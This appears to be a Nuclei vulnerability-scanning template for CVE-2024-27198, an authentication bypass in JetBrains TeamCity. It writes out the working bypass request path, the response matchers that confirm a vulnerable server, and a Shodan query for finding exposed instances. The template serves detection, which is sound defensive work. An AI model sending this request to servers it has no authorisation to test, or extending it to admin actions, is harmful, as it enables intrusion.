34 lines
1.0 KiB
YAML
34 lines
1.0 KiB
YAML
|
id: CVE-2024-27198
|
||
|
|
||
|
info:
|
||
|
name: TeamCity < 2023.11.4 - Authentication Bypass
|
||
|
author: DhiyaneshDk
|
||
|
severity: critical
|
||
|
description: |
|
||
|
In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible
|
||
|
reference:
|
||
|
- https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-27198
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cwe-id: CWE-288
|
||
|
metadata:
|
||
|
verified: true
|
||
|
max-request: 1
|
||
|
shodan-query: http.component:"TeamCity"
|
||
|
tags: cve,cve2024,teamcity,jetbrains
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"
|
||
|
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code == 200'
|
||
|
- 'contains(header, "application/xml")'
|
||
|
- 'contains(body, "buildNumber") && contains(body, "server version")'
|
||
|
condition: and
|